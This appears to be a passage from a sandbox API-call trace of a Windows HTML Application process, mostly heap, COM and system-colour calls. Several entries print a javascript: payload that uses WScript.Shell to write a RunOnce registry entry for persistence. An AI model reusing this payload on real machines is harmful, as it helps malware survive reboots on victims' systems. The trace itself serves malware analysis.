CoTaskMemFree (pv=0x79da00) [0066.415] CoTaskMemFree (pv=0x78bce8) [0066.415] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x8, Size=0x14) returned 0x783810 [0066.415] LoadLibraryA (lpLibFileName="OLEAUT32.dll") returned 0x76e40000 [0066.416] GetProcAddress (hModule=0x76e40000, lpProcName=0x6) returned 0x76e43e59 [0066.416] StrCmpCW (pszStr1="Software\\Microsoft\\Internet Explorer", pszStr2="Software\\Microsoft\\Windows Mail\\Trident") returned -14 [0066.416] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x8, Size=0x340) returned 0x7a0530 [0066.416] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x4a) returned 0x79da00 [0066.416] IsOS (dwOS=0x25) returned 1 [0066.416] GetSysColor (nIndex=26) returned 0xcc6600 [0066.416] IsOS (dwOS=0x25) returned 1 [0066.416] GetSysColor (nIndex=5) returned 0xffffff [0066.416] GetSysColor (nIndex=8) returned 
0x0 [0066.416] HeapFree (in: hHeap=0x760000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x760000) returned 1 [0066.416] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x10) returned 0x78bce8 [0066.467] wcstol (in: _String="0,0,255", _EndPtr=0x33e3bc, _Radix=10 | out: _EndPtr=0x33e3bc*=",0,255") returned 0 [0066.467] wcstol (in: _String="0,255", _EndPtr=0x33e3bc, _Radix=10 | out: _EndPtr=0x33e3bc*=",255") returned 0 [0066.467] wcstol (in: _String="255", _EndPtr=0x33e3bc, _Radix=10 | out: _EndPtr=0x33e3bc*="") returned 255 [0066.467] wcstol (in: _String="128,0,128", _EndPtr=0x33e3bc, _Radix=10 | out: _EndPtr=0x33e3bc*=",0,128") returned 128 [0066.467] wcstol (in: _String="0,128", _EndPtr=0x33e3bc, _Radix=10 | out: _EndPtr=0x33e3bc*=",128") returned 0 [0066.467] wcstol (in: _String="128", _EndPtr=0x33e3bc, _Radix=10 | out: _EndPtr=0x33e3bc*="") returned 128 [0066.469] GetModuleHandleW (lpModuleName="EXPLORER.EXE") returned 0x0 [0066.469] GetModuleHandleW (lpModuleName="IEXPLORE.EXE") returned 0x0 [0066.469] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\PageSetup", ulOptions=0x0, samDesired=0x20019, phkResult=0x33f474 | out: phkResult=0x33f474*=0x1a4) returned 0x0 [0066.470] SHGetValueW (in: hkey=0x1a4, pszSubKey=0x0, pszValue="Print_Background", pdwType=0x0, pvData=0x33f478, pcbData=0x33f470*=0xa | out: pdwType=0x0, pvData=0x33f478, pcbData=0x33f470*=0xa) returned 0x2 [0066.470] RegCloseKey (hKey=0x1a4) returned 0x0 [0066.470] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x80) returned 0x7a18b8 [0066.470] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x10) returned 0x78bc88 [0066.470] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x3a) returned 0x7743b8 [0066.471] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x6a) returned 0x7a1940 [0066.524] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x10) returned 0x78bcb8 [0066.524] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x26) 
returned 0x77d338 [0066.525] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x6e) returned 0x7a19b8 [0066.525] GetProcessHeap () returned 0x760000 [0066.525] HeapFree (in: hHeap=0x760000, dwFlags=0x0, lpMem=0x7a0878 | out: hHeap=0x760000) returned 1 [0066.525] GetProcessHeap () returned 0x760000 [0066.525] HeapFree (in: hHeap=0x760000, dwFlags=0x0, lpMem=0x7a08d0 | out: hHeap=0x760000) returned 1 [0066.525] GetProcessHeap () returned 0x760000 [0066.525] HeapFree (in: hHeap=0x760000, dwFlags=0x0, lpMem=0x78c0b8 | out: hHeap=0x760000) returned 1 [0066.525] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x14) returned 0x783830 [0066.525] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x10) returned 0x79dbc0 [0066.525] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x14) returned 0x783850 [0066.525] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x40) returned 0x774400 [0066.526] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x60) returned 0x7a1a30 [0066.526] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x24) returned 0x77d368 [0066.527] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x1c) returned 0x790888 [0066.527] GetAcceptLanguagesW () returned 0x0 [0066.527] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x10) returned 0x78b970 [0066.527] GetClassNameW (in: hWnd=0x3027a, lpClassName=0x33f744, nMaxCount=10 | out: lpClassName="HTML Appl") returned 9 [0066.527] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="HTML Appl", cchCount1=9, lpString2="HH Parent", cchCount2=9) returned 3 [0066.527] GetParent (hWnd=0x3027a) returned 0x6011a [0066.527] GetClassNameW (in: hWnd=0x6011a, lpClassName=0x33f744, nMaxCount=10 | out: lpClassName="HTML Appl") returned 9 [0066.527] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="HTML Appl", cchCount1=9, lpString2="HH Parent", cchCount2=9) returned 3 [0066.527] GetParent (hWnd=0x6011a) returned 0x0 [0066.527] RtlAllocateHeap (HeapHandle=0x760000, 
Flags=0x8, Size=0x14) returned 0x783870 [0066.527] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x28) returned 0x77d398 [0066.527] HeapFree (in: hHeap=0x760000, dwFlags=0x0, lpMem=0x783870 | out: hHeap=0x760000) returned 1 [0066.586] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x8, Size=0x4c) returned 0x7a1a98 [0066.586] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x8, Size=0xe) returned 0x79dc38 [0066.586] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x8, Size=0x94) returned 0x7a1af0 [0066.586] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x8, Size=0x14) returned 0x783870 [0066.587] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x8, Size=0x12) returned 0x783890 [0066.587] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x8, Size=0x14) returned 0x7838b0 [0066.587] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x8, Size=0xe) returned 0x79dc50 [0066.587] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x8, Size=0x10) returned 0x79dc68 [0066.587] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x8, Size=0xe) returned 0x79dc80 [0066.587] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x8, Size=0x10) returned 0x79dc98 [0066.587] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x1c) returned 0x7908b0 [0066.587] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x1a) returned 0x7908d8 [0066.587] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x1a) returned 0x790900 [0066.587] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x12) returned 0x7838d0 [0066.587] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x12) returned 0x7838f0 [0066.587] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x12) returned 0x783910 [0066.587] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x12) returned 0x783930 [0066.587] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x8, Size=0x10) returned 0x79dcb0 [0066.588] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0xc) returned 0x79dce0 [0066.588] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x8, Size=0x10) returned 
0x79dcf8 [0066.588] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x12) returned 0x783950 [0066.588] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x8, Size=0xe) returned 0x79dd10 [0066.588] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0xa) returned 0x79dd28 [0066.588] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x8, Size=0x26) returned 0x77d3c8 [0066.588] GetProcessHeap () returned 0x760000 [0066.588] HeapFree (in: hHeap=0x760000, dwFlags=0x0, lpMem=0x790928 | out: hHeap=0x760000) returned 1 [0066.589] GetProcessHeap () returned 0x760000 [0066.589] HeapFree (in: hHeap=0x760000, dwFlags=0x0, lpMem=0x790950 | out: hHeap=0x760000) returned 1 [0066.589] GetProcessHeap () returned 0x760000 [0066.589] HeapFree (in: hHeap=0x760000, dwFlags=0x0, lpMem=0x790978 | out: hHeap=0x760000) returned 1 [0066.589] GetProcessHeap () returned 0x760000 [0066.589] HeapFree (in: hHeap=0x760000, dwFlags=0x0, lpMem=0x78b940 | out: hHeap=0x760000) returned 1 [0066.589] HeapFree (in: hHeap=0x760000, dwFlags=0x0, lpMem=0x79dcb0 | out: hHeap=0x760000) returned 1 [0066.589] IMoniker:GetDisplayName (in: This=0x78af40, pbc=0x0, pmkToLeft=0x0, ppszDisplayName=0x33f708 | out: ppszDisplayName=0x33f708*="javascript:o=new ActiveXObject('WScript.Shell');x=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{i=x.GetFile('osk.exe').Path;o.RegWrite('HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\pmleb',i);}catch(e){}},10);") returned 0x0 [0066.589] IUnknown:QueryInterface (in: This=0x78af40, riid=0x74c272f4*(Data1=0xa158a630, Data2=0xed6f, Data3=0x45fb, Data4=([0]=0xb9, [1]=0x87, [2]=0xf6, [3]=0x86, [4]=0x76, [5]=0xf5, [6]=0x77, [7]=0x52)), ppvObject=0x33f6e0 | out: ppvObject=0x33f6e0*=0x78af4c) returned 0x0 [0066.589] IUriContainer:GetIUri (in: This=0x78af4c, ppIUri=0x33f710 | out: ppIUri=0x33f710*=0x78ca14) returned 0x0 [0066.589] IUnknown:Release (This=0x78af4c) returned 0x1 [0066.589] IUnknown:AddRef (This=0x78af40) returned 0x2 
[0066.589] IUnknown:AddRef (This=0x78ca14) returned 0x5 [0066.590] HeapFree (in: hHeap=0x760000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x760000) returned 1 [0066.590] HeapFree (in: hHeap=0x760000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x760000) returned 1 [0066.590] IMoniker:GetDisplayName (in: This=0x78af40, pbc=0x0, pmkToLeft=0x0, ppszDisplayName=0x33f5e8 | out: ppszDisplayName=0x33f5e8*="javascript:o=new ActiveXObject('WScript.Shell');x=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{i=x.GetFile('osk.exe').Path;o.RegWrite('HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\pmleb',i);}catch(e){}},10);") returned 0x0 [0066.590] UrlGetLocationW (psz1="javascript:o=new ActiveXObject('WScript.Shell');x=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{i=x.GetFile('osk.exe').Path;o.RegWrite('HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\pmleb',i);}catch(e){}},10);") returned 0x0 [0066.590] CreateURLMonikerEx (in: pMkCtx=0x0, szURL="javascript:o=new ActiveXObject('WScript.Shell');x=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{i=x.GetFile('osk.exe').Path;o.RegWrite('HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\pmleb',i);}catch(e){}},10);", ppmk=0x33f5b4*=0x0, dwFlags=0x1 | out: ppmk=0x33f5b4*=0x7a08d0) returned 0x0 [0066.591] DllGetClassObject (in: rclsid=0x79224c*(Data1=0x3050f3b2, Data2=0x98b5, Data3=0x11cf, Data4=([0]=0xbb, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xbd, [6]=0xce, [7]=0xb)), riid=0x76814430*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f0f8 | out: ppv=0x33f0f8*=0x75028d20) returned 0x0 [0066.591] IUnknown:QueryInterface (in: This=0x75028d20, riid=0x7683aadc*(Data1=0x79eac9ec, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0x33f1e4 | out: 
ppvObject=0x33f1e4*=0x75028d2c) returned 0x0 [0066.591] IUnknown:Release (This=0x75028d20) returned 0x1 [0066.591] IInternetProtocolInfo:ParseUrl (in: This=0x75028d2c, pwzUrl="javascript:o=new ActiveXObject('WScript.Shell');x=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{i=x.GetFile('osk.exe').Path;o.RegWrite('HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\pmleb',i);}catch(e){}},10);", ParseAction=1, dwParseFlags=0x10000, pwzResult=0x7a1fa0, cchResult=0x824, pcchResult=0x33f4f8, dwReserved=0x0 | out: pwzResult="", pcchResult=0x33f4f8*=0x0) returned 0x800c0011 [0066.591] IUnknown:Release (This=0x75028d2c) returned 0x1 [0066.592] CreateUri (in: pwzURI="javascript:o=new ActiveXObject('WScript.Shell');x=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{i=x.GetFile('osk.exe').Path;o.RegWrite('HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\pmleb',i);}catch(e){}},10);", dwFlags=0x2b84, dwReserved=0x0, ppURI=0x33f5ac | out: ppURI=0x33f5ac*=0x78c78c) returned 0x0 [0066.592] IUri:GetScheme (in: This=0x78c78c, pdwScheme=0x33f544 | out: pdwScheme=0x33f544*=0xf) returned 0x0 [0066.592] CoInternetIsFeatureEnabled (FeatureEntry=0x1, dwFlags=0x2) returned 0x1 [0066.592] IUnknown:QueryInterface (in: This=0x78c78c, riid=0x74cad6e8*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x33f54c | out: ppvObject=0x33f54c*=0x78c78c) returned 0x0 [0066.593] IUnknown:Release (This=0x78c78c) returned 0x2 [0066.593] IUnknown:AddRef (This=0x78c78c) returned 0x3 [0066.593] IUnknown:Release (This=0x78c78c) returned 0x2 [0066.593] HeapFree (in: hHeap=0x760000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x760000) returned 1 [0066.593] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x8, Size=0x1c) returned 0x790978 [0066.593] IUnknown:AddRef (This=0x78c78c) returned 0x3 [0066.593] IUri:GetAbsoluteUri (in: 
This=0x78c78c, pbstrAbsoluteUri=0x790978 | out: pbstrAbsoluteUri=0x790978*="javascript:o=new ActiveXObject('WScript.Shell');x=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{i=x.GetFile('osk.exe').Path;o.RegWrite('HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\pmleb',i);}catch(e){}},10);") returned 0x0 [0066.593] IUnknown:Release (This=0x78c78c) returned 0x2 [0066.593] IUnknown:AddRef (This=0x7a08d0) returned 0x2 [0066.593] IUnknown:Release (This=0x7a08d0) returned 0x1 [0066.593] IUnknown:AddRef (This=0x78af40) returned 0x3 [0066.593] IUnknown:Release (This=0x7a08d0) returned 0x0 [0066.593] IUnknown:AddRef (This=0x78af40) returned 0x4 [0066.593] IUnknown:QueryInterface (in: This=0x78ca14, riid=0x74cad6e8*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x33f3b4 | out: ppvObject=0x33f3b4*=0x78ca14) returned 0x0 [0066.593] IUnknown:Release (This=0x78ca14) returned 0x5 [0066.593] IUnknown:AddRef (This=0x78ca14) returned 0x6 [0066.593] IUnknown:QueryInterface (in: This=0x78af40, riid=0x74c272f4*(Data1=0xa158a630, Data2=0xed6f, Data3=0x45fb, Data4=([0]=0xb9, [1]=0x87, [2]=0xf6, [3]=0x86, [4]=0x76, [5]=0xf5, [6]=0x77, [7]=0x52)), ppvObject=0x33f388 | out: ppvObject=0x33f388*=0x78af4c) returned 0x0 [0066.593] IUriContainer:GetIUri (in: This=0x78af4c, ppIUri=0x33f3dc | out: ppIUri=0x33f3dc*=0x78ca14) returned 0x0 [0066.593] IUnknown:Release (This=0x78af4c) returned 0x4 [0066.593] IUnknown:AddRef (This=0x78af40) returned 0x5 [0066.593] IUnknown:Release (This=0x78af40) returned 0x4 [0066.594] IUnknown:AddRef (This=0x78ca14) returned 0x8 [0066.594] IUnknown:QueryInterface (in: This=0x78ca14, riid=0x74cad6e8*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x33f3b4 | out: ppvObject=0x33f3b4*=0x78ca14) returned 0x0 [0066.594] 
IUnknown:Release (This=0x78ca14) returned 0x8 [0066.594] IUnknown:AddRef (This=0x78ca14) returned 0x9 [0066.594] IUri:GetScheme (in: This=0x78ca14, pdwScheme=0x33f3ac | out: pdwScheme=0x33f3ac*=0xf) returned 0x0 [0066.594] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x8, Size=0xc8) returned 0x7a4218 [0066.594] GetCurrentProcessId () returned 0x7bc [0066.594] IUnknown:QueryInterface (in: This=0x78ca14, riid=0x74cad6e8*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x33f3b4 | out: ppvObject=0x33f3b4*=0x78ca14) returned 0x0 [0066.594] IUnknown:Release (This=0x78ca14) returned 0x9 [0066.594] IUnknown:AddRef (This=0x78ca14) returned 0xa [0066.594] IUri:GetScheme (in: This=0x78ca14, pdwScheme=0x33f384 | out: pdwScheme=0x33f384*=0xf) returned 0x0 [0066.594] IUri:GetAbsoluteUri (in: This=0x78ca14, pbstrAbsoluteUri=0x33f3b4 | out: pbstrAbsoluteUri=0x33f3b4*="javascript:o=new ActiveXObject('WScript.Shell');x=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{i=x.GetFile('osk.exe').Path;o.RegWrite('HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\pmleb',i);}catch(e){}},10);") returned 0x0 [0066.595] GetProcAddress (hModule=0x76e40000, lpProcName=0x7) returned 0x76e44680 [0066.595] SysStringLen (param_1="javascript:o=new ActiveXObject('WScript.Shell');x=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{i=x.GetFile('osk.exe').Path;o.RegWrite('HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\pmleb',i);}catch(e){}},10);") returned 0xfd [0066.595] CreateUri (in: pwzURI="javascript:o=new ActiveXObject('WScript.Shell');x=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{i=x.GetFile('osk.exe').Path;o.RegWrite('HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\pmleb',i);}catch(e){}},10);", dwFlags=0x2b80, dwReserved=0x0, ppURI=0x33f3d0 | out: 
ppURI=0x33f3d0*=0x78c78c) returned 0x0 [0066.595] IUnknown:Release (This=0x78ca14) returned 0x9 [0066.595] IUri:GetScheme (in: This=0x78c78c, pdwScheme=0x33f364 | out: pdwScheme=0x33f364*=0xf) returned 0x0 [0066.595] IUnknown:QueryInterface (in: This=0x78c78c, riid=0x74cad6e8*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x33f36c | out: ppvObject=0x33f36c*=0x78c78c) returned 0x0 [0066.595] IUnknown:Release (This=0x78c78c) returned 0x3 [0066.595] IUnknown:AddRef (This=0x78c78c) returned 0x4 [0066.595] IUnknown:Release (This=0x78c78c) returned 0x3 [0066.595] IUnknown:AddRef (This=0x78c78c) returned 0x4 [0066.595] IUri:GetPropertyDWORD (in: This=0x78c78c, uriProp=0x11, pdwProperty=0x33f144, dwFlags=0x0 | out: pdwProperty=0x33f144*=0xf) returned 0x0 [0066.595] IInternetSecurityManager:GetSecurityId (in: This=0x796530, pwszUrl="javascript:o=new ActiveXObject('WScript.Shell');x=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{i=x.GetFile('osk.exe').Path;o.RegWrite('HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\pmleb',i);}catch(e){}},10);", pbSecurityId=0x33f1a8, pcbSecurityId=0x33f1a4*=0x200, dwReserved=0x0 | out: pbSecurityId=0x33f1a8*=0x6a, pcbSecurityId=0x33f1a4*=0x101) returned 0x0 [0066.595] IInternetSecurityManager:GetSecurityId (in: This=0x750296bc, pwszUrl="javascript:o=new ActiveXObject('WScript.Shell');x=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{i=x.GetFile('osk.exe').Path;o.RegWrite('HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\pmleb',i);}catch(e){}},10);", pbSecurityId=0x33f1a8, pcbSecurityId=0x33f1a4*=0x200, dwReserved=0x0 | out: pbSecurityId=0x33f1a8*=0x0, pcbSecurityId=0x33f1a4*=0x200) returned 0x800c0011 [0066.596] DllGetClassObject (in: rclsid=0x79224c*(Data1=0x3050f3b2, Data2=0x98b5, Data3=0x11cf, Data4=([0]=0xbb, [1]=0x82, [2]=0x0, [3]=0xaa, 
[4]=0x0, [5]=0xbd, [6]=0xce, [7]=0xb)), riid=0x76814430*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33ea80 | out: ppv=0x33ea80*=0x75028d20) returned 0x0 [0066.596] IUnknown:QueryInterface (in: This=0x75028d20, riid=0x7683aadc*(Data1=0x79eac9ec, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0x33eb6c | out: ppvObject=0x33eb6c*=0x75028d2c) returned 0x0 [0066.596] IUnknown:Release (This=0x75028d20) returned 0x1 [0066.596] IInternetProtocolInfo:ParseUrl (in: This=0x75028d2c, pwzUrl="javascript:o=new ActiveXObject('WScript.Shell');x=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{i=x.GetFile('osk.exe').Path;o.RegWrite('HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\pmleb',i);}catch(e){}},10);", ParseAction=3, dwParseFlags=0x0, pwzResult=0x7a4508, cchResult=0xfe, pcchResult=0x33ebb4, dwReserved=0x0 | out: pwzResult="javascript:o=new ActiveXObject('WScript.Shell');x=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{i=x.GetFile('osk.exe').Path;o.RegWrite('HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\pmleb',i);}catch(e){}},10);", pcchResult=0x33ebb4*=0xfe) returned 0x0 [0066.596] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x200) returned 0x7a4710 [0066.596] HeapFree (in: hHeap=0x760000, dwFlags=0x0, lpMem=0x7a4710 | out: hHeap=0x760000) returned 1 [0066.596] IUnknown:Release (This=0x75028d2c) returned 0x1 [0066.597] DllGetClassObject (in: rclsid=0x79224c*(Data1=0x3050f3b2, Data2=0x98b5, Data3=0x11cf, Data4=([0]=0xbb, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xbd, [6]=0xce, [7]=0xb)), riid=0x76814430*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33ea80 | out: ppv=0x33ea80*=0x75028d20) returned 0x0 [0066.597] 
IUnknown:QueryInterface (in: This=0x75028d20, riid=0x7683aadc*(Data1=0x79eac9ec, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0x33eb6c | out: ppvObject=0x33eb6c*=0x75028d2c) returned 0x0 [0066.597] IUnknown:Release (This=0x75028d20) returned 0x1 [0066.597] IInternetProtocolInfo:ParseUrl (in: This=0x75028d2c, pwzUrl="javascript:o=new ActiveXObject('WScript.Shell');x=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{i=x.GetFile('osk.exe').Path;o.RegWrite('HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\pmleb',i);}catch(e){}},10);", ParseAction=17, dwParseFlags=0x0, pwzResult=0x7a4508, cchResult=0xfe, pcchResult=0x33ebc4, dwReserved=0x0 | out: pwzResult="", pcchResult=0x33ebc4*=0x0) returned 0x800c0011 [0066.597] IUnknown:Release (This=0x75028d2c) returned 0x1 [0066.597] IUnknown:Release (This=0x78c78c) returned 0x4 [0066.597] HeapFree (in: hHeap=0x760000, dwFlags=0x0, lpMem=0x78bbb0 | out: hHeap=0x760000) returned 1 [0066.597] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x101) returned 0x7a83f8 [0066.598] HeapFree (in: hHeap=0x760000, dwFlags=0x0, lpMem=0x78bc28 | out: hHeap=0x760000) returned 1 [0066.598] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x101) returned 0x7a8508 [0066.630] IUri:GetScheme (in: This=0x78ca14, pdwScheme=0x33f3ac | out: pdwScheme=0x33f3ac*=0xf) returned 0x0 [0066.657] GetDC (hWnd=0x0) returned 0x1b0101ce [0066.657] CreateCompatibleBitmap (hdc=0x1b0101ce, cx=1, cy=1) returned 0x505084a [0066.657] GetDIBits (in: hdc=0x1b0101ce, hbm=0x505084a, start=0x0, cLines=0x1, lpvBits=0x0, lpbmi=0x33ef30, usage=0x0 | out: lpvBits=0x0, lpbmi=0x33ef30) returned 1 [0066.657] GetDIBits (in: hdc=0x1b0101ce, hbm=0x505084a, start=0x0, cLines=0x1, lpvBits=0x0, lpbmi=0x33ef30, usage=0x0 | out: lpvBits=0x0, lpbmi=0x33ef30) returned 1 [0066.657] DeleteObject (ho=0x505084a) returned 1 [0066.657] GetSysColor (nIndex=0) 
returned 0xc8c8c8 [0066.657] GetSysColor (nIndex=1) returned 0x0 [0066.657] GetSysColor (nIndex=2) returned 0xd1b499 [0066.657] GetSysColor (nIndex=3) returned 0xdbcdbf [0066.658] GetSysColor (nIndex=4) returned 0xf0f0f0 [0066.658] GetSysColor (nIndex=5) returned 0xffffff [0066.658] GetSysColor (nIndex=6) returned 0x646464 [0066.658] GetSysColor (nIndex=7) returned 0x0 [0066.658] GetSysColor (nIndex=8) returned 0x0 [0066.658] GetSysColor (nIndex=9) returned 0x0 [0066.658] GetSysColor (nIndex=10) returned 0xb4b4b4 [0066.658] GetSysColor (nIndex=11) returned 0xfcf7f4 [0066.658] GetSysColor (nIndex=12) returned 0xababab [0066.658] GetSysColor (nIndex=13) returned 0xff9933 [0066.658] GetSysColor (nIndex=14) returned 0xffffff [0066.658] GetSysColor (nIndex=15) returned 0xf0f0f0 [0066.658] GetSysColor (nIndex=16) returned 0xa0a0a0 [0066.658] GetSysColor (nIndex=17) returned 0x6d6d6d [0066.658] GetSysColor (nIndex=18) returned 0x0 [0066.658] GetSysColor (nIndex=19) returned 0x544e43 [0066.658] GetSysColor (nIndex=20) returned 0xffffff [0066.658] GetSysColor (nIndex=21) returned 0x696969 [0066.658] GetSysColor (nIndex=22) returned 0xe3e3e3 [0066.658] GetSysColor (nIndex=23) returned 0x0 [0066.658] GetSysColor (nIndex=24) returned 0xe1ffff [0066.658] GetSysColor (nIndex=25) returned 0x0 [0066.658] GetSysColor (nIndex=26) returned 0xcc6600 [0066.658] GetSysColor (nIndex=27) returned 0xead1b9 [0066.658] GetSysColor (nIndex=28) returned 0xf2e4d7 [0066.658] GetSysColor (nIndex=29) returned 0xff9933 [0066.658] GetSysColor (nIndex=30) returned 0xf0f0f0 [0066.658] GetSysColor (nIndex=31) returned 0x0 [0066.658] GetSysColor (nIndex=32) returned 0x0 [0066.658] GetSysColor (nIndex=33) returned 0x0 [0066.658] GetSysColor (nIndex=34) returned 0x0 [0066.659] GetSysColor 